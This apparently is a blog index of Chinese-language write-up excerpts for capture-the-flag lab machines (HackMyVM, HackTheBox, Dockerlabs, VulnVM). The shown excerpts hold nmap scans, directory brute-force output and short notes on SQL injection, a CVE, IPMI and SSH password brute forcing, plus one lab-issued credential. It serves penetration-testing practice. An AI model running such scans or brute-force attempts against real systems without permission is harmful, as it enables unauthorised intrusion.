[04:48:06] 301 - 319B - /service?Wsdl  ->  http://192.168.55.41/service/?Wsdl
[04:48:06] 301 - 312B - /style  ->  http://192.168.55.41/style/           
[04:48:10] 403 - 276B - /server-status/                                    
[04:48:11] 403 - 276B - /server-status

Task Completed                                                                                                                                  

[root@kali] /home/kali/homelab  
❯ curl http://192.168.55.41/service/      
Whoa! But sorry, this service is only available for myself!#

看到有一个service路径，但是好像需要认证

Dockerlabs-Ciberguard

Tue, 13 May 2025 00:00:00 +0000

Machine Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/ciberguard  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:f6:3a:98:23:dc:8b:00:f0:5c:d5:50:07:f9:ec:e7 (ECDSA)
|_  256 b0:4e:cb:2a:e0:ac:cf:4c:14:7b:23:57:00:6d:12:1d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CyberGuard - Seguridad Digital

Feroxbuster

[root@kali] /home/kali/ciberguard  
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.2/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      309c http://172.17.0.2/images => http://172.17.0.2/images/
200      GET       77l      154w     2111c http://172.17.0.2/archiv/script.js
200      GET      311l      560w     5015c http://172.17.0.2/archiv/styles.css
200      GET      231l     1204w   142716c http://172.17.0.2/images/Imagen(1).jpg
200      GET       59l      323w    28431c http://172.17.0.2/images/Image.jpg
200      GET      103l      363w     5100c http://172.17.0.2/
200      GET      279l     1484w   159900c http://172.17.0.2/images/Imagen%282%29.jpg
200      GET       12l      114w     7473c http://172.17.0.2/images/Iconn.png
200      GET      190l     1007w    91180c http://172.17.0.2/images/Imagen%285%29.png.jpg
200      GET      195l     1148w   120954c http://172.17.0.2/images/Imagen%283%29.jpg
200      GET      243l     1220w   121023c http://172.17.0.2/images/Imagen%284%29.jpg
200      GET      231l     1204w   142716c http://172.17.0.2/images/Imagen%281%29.jpg
301      GET        9l       28w      309c http://172.17.0.2/archiv => http://172.17.0.2/archiv/
403      GET        9l       28w      275c http://172.17.0.2/server-status
[####################] - 29s   661689/661689  0s      found:14      errors:1341   
[####################] - 28s   661638/661638  23558/s http://172.17.0.2/ 
[####################] - 0s    661638/661638  3576422/s http://172.17.0.2/images/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s    661638/661638  330819000/s http://172.17.0.2/archiv/ => Directory listing (add --scan-dir-listings to scan)

Own chloe

查看到目录下有一个**/archiv/script.js**

HTB-Planning

Mon, 12 May 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Nmap

[root@kali] /home/kali/Planning  
❯ nmap planning.htb -sV -A                 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website

80端口没有什么可以利用的东西，尝试爆破子域名

HackMyVM-Pycrt

Sun, 11 May 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/pycrt  
❯ nmap 192.168.55.36 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
6667/tcp open  irc
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   server: irc.local
|   version: InspIRCd-3. irc.local 
|   source ident: nmap
|   source host: 192.168.55.4
|_  error: Closing link: (nmap@192.168.55.4) [Client exited]

80端口没有可以利用的信息，只是一个静态页面

HTB-Environment

Wed, 07 May 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Environment  
❯ nmap Environment.htb -sV -A

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_  256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open  http    nginx 1.22.1
|_http-title: Save the Environment | environment.htb
|_http-server-header: nginx/1.22.1

Dirsearch

[root@kali] /home/kali/Environment  
❯ dirsearch -u http://environment.htb 

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://environment.htb/

[07:23:08] Scanning:                                                                                                                            
[07:23:23] 403 - 555B - /admin/.config                                    
[07:23:23] 403 - 555B - /admin/.htaccess
[07:23:39] 403 - 555B - /administrator/.htaccess                          
[07:23:43] 403 - 555B - /admpar/.ftppass                                  
[07:23:43] 403 - 555B - /admrev/.ftppass
[07:23:46] 403 - 555B - /app/.htaccess                                    
[07:23:52] 403 - 555B - /bitrix/.settings.bak                             
[07:23:52] 403 - 555B - /bitrix/.settings
[07:23:52] 403 - 555B - /bitrix/.settings.php.bak                         
[07:23:54] 301 - 169B - /build  ->  http://environment.htb/build/         
[07:23:54] 403 - 555B - /build/                                           
[07:24:15] 403 - 555B - /ext/.deps                                        
[07:24:15] 200 - 0B - /favicon.ico                                      
[07:24:26] 200 - 4KB - /index.php                                        
[07:24:26] 200 - 2KB - /index.php/login/                                 
[07:24:31] 403 - 555B - /lib/flex/varien/.project                         
[07:24:31] 403 - 555B - /lib/flex/uploader/.actionScriptProperties
[07:24:31] 403 - 555B - /lib/flex/varien/.flexLibProperties
[07:24:31] 403 - 555B - /lib/flex/varien/.actionScriptProperties
[07:24:31] 403 - 555B - /lib/flex/uploader/.flexProperties
[07:24:31] 403 - 555B - /lib/flex/uploader/.project
[07:24:31] 403 - 555B - /lib/flex/uploader/.settings
[07:24:31] 403 - 555B - /lib/flex/varien/.settings
[07:24:34] 200 - 2KB - /login                                            
[07:24:34] 200 - 2KB - /login/                                           
[07:24:35] 302 - 358B - /logout/  ->  http://environment.htb/login        
[07:24:35] 302 - 358B - /logout  ->  http://environment.htb/login         
[07:24:36] 403 - 555B - /mailer/.env                                      
[07:25:01] 403 - 555B - /resources/sass/.sass-cache/                      
[07:25:01] 403 - 555B - /resources/.arch-internal-preview.css
[07:25:02] 200 - 24B - /robots.txt                                       
[07:25:12] 301 - 169B - /storage  ->  http://environment.htb/storage/     
[07:25:12] 403 - 555B - /storage/
[07:25:19] 403 - 555B - /twitter/.env                                     
[07:25:21] 405 - 244KB - /upload/                                          
[07:25:22] 405 - 244KB - /upload                                           
[07:25:24] 403 - 555B - /vendor/                                          
                                                                             
Task Completed

Env Bypass

进入登录页，进行抓包，可以看到直接带出了报错信息

Dockerlabs-BaluFood

Thu, 01 May 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/balufood  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 69:15:7d:34:74:1c:21:8a:cb:2c:a2:8c:42:a4:21:7f (ECDSA)
|_  256 a7:3a:c9:b2:ac:cf:44:77:a7:9c:ab:89:98:c7:88:3f (ED25519)
5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Restaurante Balulero - Inicio

Weak Pass

进入到172.17.0.2:5000/login

HTB-Eureka

Tue, 29 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/Eureka  
❯ nmap Eureka.htb -sV -A    

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

添加furni.htb到**/etc/hosts**

Dockerlabs-Gallery

Sat, 26 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/Gallery  
❯ nmap 172.17.0.3 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 19:95:1a:f2:f6:7a:a1:f1:ba:16:4b:58:a0:59:f2:02 (ECDSA)
|_  256 e7:e9:8f:b8:db:94:c2:68:11:4c:25:81:f1:ac:cd:ac (ED25519)
80/tcp open  http    PHP cli server 5.5 or later (PHP 8.3.6)
|_http-title: Galer\xC3\xADa de Arte Digital

Feroxbuster

[root@kali] /home/kali/Gallery  
❯ feroxbuster -u 'http://172.17.0.3/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.3/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       29l       83w     1478c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       57w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      266l      543w     5288c http://172.17.0.3/style.css
200      GET       28l       63w     1104c http://172.17.0.3/login.php
200      GET        0l        0w        0c http://172.17.0.3/config.php
302      GET        0l        0w        0c http://172.17.0.3/dashboard.php => login.php

SQL Injection

在用户名这里存在注入点

HackMyVM-Immortal

Sat, 26 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/immportal  
❯ nmap 192.168.55.17 -sV -A -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.55.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0        0             504 Feb 27  2024 message.txt
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 e8:79:ad:8b:d1:a8:39:1b:ac:ed:52:ef:d0:22:0e:eb (RSA)
|   256 65:df:6d:1d:49:11:bd:f3:2f:fa:10:0c:3b:48:69:39 (ECDSA)
|_  256 f6:b7:bf:cf:a5:d5:1b:26:4e:13:08:31:07:d5:79:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Password
|_http-server-header: Apache/2.4.56 (Debian)

Own www-data

HackMyVM-Up

Sat, 26 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Diffculty	Easy

Nmap

[root@kali] /home/kali/up  
❯ nmap 192.168.55.16 -sV -A -p-

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: RodGar - Subir Imagen

进入之后是一个上传页面，经过测试没有漏洞

Feroxbuster

[root@kali] /home/kali/up  
❯ feroxbuster -u 'http://192.168.55.16/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.16/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      150l      388w     4489c http://192.168.55.16/
301      GET        9l       28w      316c http://192.168.55.16/uploads => http://192.168.55.16/uploads/
301      GET        9l       28w      319c http://192.168.55.16/javascript => http://192.168.55.16/javascript/
200      GET      150l      388w     4489c http://192.168.55.16/index.php
403      GET       31l       94w      964c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        1w     1301c http://192.168.55.16/uploads/robots.txt
301      GET        9l       28w      329c http://192.168.55.16/javascript/clipboard => http://192.168.55.16/javascript/clipboard/
200      GET      858l     3081w    26377c http://192.168.55.16/javascript/clipboard/clipboard

Own www-data

注意到**/uploads下还有一个robots.txt**，经过解码得到源码

Dockerlabs-Bicho

Fri, 25 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/bicho  
❯ nmap 172.17.0.2 -sV -A -p- 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 09:26 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Did not follow redirect to http://bicho.dl
|_http-server-header: Apache/2.4.58 (Ubuntu)

添加bicho.dl到**/etc/hosts**

HackMyVM-Mathdop

Thu, 24 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficult	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.55.13 -sV -A -p-

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:78:16:74:49:a1:68:9d:54:84:8a:59:e9:38:10:bc (RSA)
|   256 06:0c:4d:9d:2c:32:43:d2:3d:f7:4f:82:c8:15:85:60 (ECDSA)
|_  256 3b:cd:fc:1f:dd:48:0f:ee:17:78:9a:f1:09:cb:8c:ec (ED25519)
7577/tcp open  http    Apache Tomcat (language: en)
| http-title: Site doesn't have a title (application/hal+json).
|_Requested resource was http://192.168.55.13:7577/api
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
9393/tcp open  http    Apache Tomcat (language: en)
| http-methods: 
|_  Potentially risky methods: PUT PATCH DELETE
|_http-title: Site doesn't have a title (application/hal+json).

CVE-2024-37084

进入到9393端口的dashboard

HackMyVM-Atom

Tue, 22 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/atom  
❯ nmap 192.168.55.12 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)

只有22端口开放？有趣

扫一下UDP端口

[root@kali] /home/kali/atom  
❯ nmap 192.168.55.12 -sU --top-ports 100                                                                                                      ⏎

PORT    STATE SERVICE
623/udp open  asf-rmcp

IPMI

IPMI（智能平台管理接口）能够横跨不同的操作系统、固件和硬件平台，可以智能的监视、控制和自动回报大量服务器的运作状况，以降低服务器系统成本。

VulnVM-Get

Tue, 22 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.55.11 -sV -A -p- 

Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 69:dc:67:49:10:2a:a4:26:a8:9f:c4:5d:a3:b8:a1:3e (ECDSA)
|_  256 6a:2b:e4:44:29:78:62:fb:61:0b:09:2f:9c:bc:18:c6 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

Feroxbuster

[root@kali] /home/kali  
❯ feroxbuster -u 'http://192.168.55.11/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.11/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        0l        0w        0c http://192.168.55.11/contact.php
200      GET       25l      127w    10359c http://192.168.55.11/icons/openlogo-75.png
200      GET      368l      933w    10701c http://192.168.55.11/
[####################] - 19s   220551/220551  0s      found:3       errors:0      
[####################] - 18s   220546/220546  12201/s http://192.168.55.11/

其中contact.php并没有任何回显，尝试参数爆破

HackMyVM-HackingToys

Mon, 21 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/hackingtoys  
❯ nmap 192.168.55.10 -sV -A -p-

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
3000/tcp open  ssl/ppp?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Not valid before: 2024-05-20T15:36:20
|_Not valid after:  2038-01-27T15:36:20
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Content-Length: 930
|     Puma caught this error: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma? (Puma::HttpParserError)
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/client.rb:268:in `execute'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/client.rb:268:in `try_to_finish'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/server.rb:298:in `reactor_wakeup'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/server.rb:248:in `block in run'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:119:in `wakeup!'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `block in select_loop'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `select'
|     /usr/local/rvm/gems/ruby-3.1.0/gems/puma-6.4.2/lib/puma/reactor.rb:76:in `select_loop'
|     /usr/loc
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     content-type: text/html; charset=UTF-8
|     Content-Length: 5702
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta name="turbo-visit-control" content="reload">
|     <title>Action Controller: Exception caught</title>
|     <style>
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     color-scheme: light dark;
|     supported-color-schemes: light dark;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C00;
|_    padding:

查看3000端口服务，是Ruby on rails

HackMyVM-Pwned

Sun, 20 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.158 -sV -A -p- 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!

Feroxbuster

[root@kali] /home/kali/pwned  
❯ feroxbuster -u http://192.168.55.6/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,txt
                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.55.6/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                   
403      GET        9l       28w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                                   
200      GET       16l       27w      194c http://192.168.55.6/nothing/nothing.html
200      GET       75l      191w     3065c http://192.168.55.6/
200      GET        4l        7w       41c http://192.168.55.6/robots.txt
301      GET        9l       28w      314c http://192.168.55.6/nothing => http://192.168.55.6/nothing/
301      GET        9l       28w      318c http://192.168.55.6/hidden_text => http://192.168.55.6/hidden_text/
200      GET       22l       21w      211c http://192.168.55.6/hidden_text/secret.dic

下载这个dic用作扫描字典

HackMyVM-Gift

Sat, 19 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.157 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   3072 2c:1b:36:27:e5:4c:52:7b:3e:10:94:41:39:ef:b2:95 (RSA)
|   256 93:c1:1e:32:24:0e:34:d9:02:0e:ff:c3:9c:59:9b:dd (ECDSA)
|_  256 81:ab:36:ec:b1:2b:5c:d2:86:55:12:0c:51:00:27:d7 (ED25519)
80/tcp open  http    nginx
|_http-title: Site doesn't have a title (text/html).

目录扫描失败

[root@kali] /home/kali  
❯ curl "http://192.168.56.157/" -v  
*   Trying 192.168.56.157:80...
* Connected to 192.168.56.157 (192.168.56.157) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 192.168.56.157
> User-Agent: curl/8.12.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx
< Date: Sat, 19 Apr 2025 06:42:57 GMT
< Content-Type: text/html
< Content-Length: 57
< Last-Modified: Sun, 20 Sep 2020 16:29:39 GMT
< Connection: keep-alive
< ETag: "5f678373-39"
< Accept-Ranges: bytes
< 

Dont Overthink. Really, Its simple.
        <!-- Trust me -->

* Connection #0 to host 192.168.56.157 left intact

Hydra to ssh

尝试使用simple爆破登录

VulnVM-easyaspie

Sat, 19 Apr 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/homelab  
❯ nmap 192.168.56.156 -sV -A -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8c:c5:70:a6:8f:7c:53:6f:98:6d:01:9c:63:b7:3b:60 (RSA)
|   256 31:1f:74:73:32:ff:8e:f0:f9:63:fb:51:13:98:32:27 (ECDSA)
|_  256 7e:1f:ea:1b:50:38:d8:88:5a:fc:cb:6f:70:3f:25:0b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

Gobuster

[root@kali] /home/kali/homelab  
❯ gobuster dir -u http://192.168.56.156/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt -t 50                    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/note.txt             (Status: 200) [Size: 162]
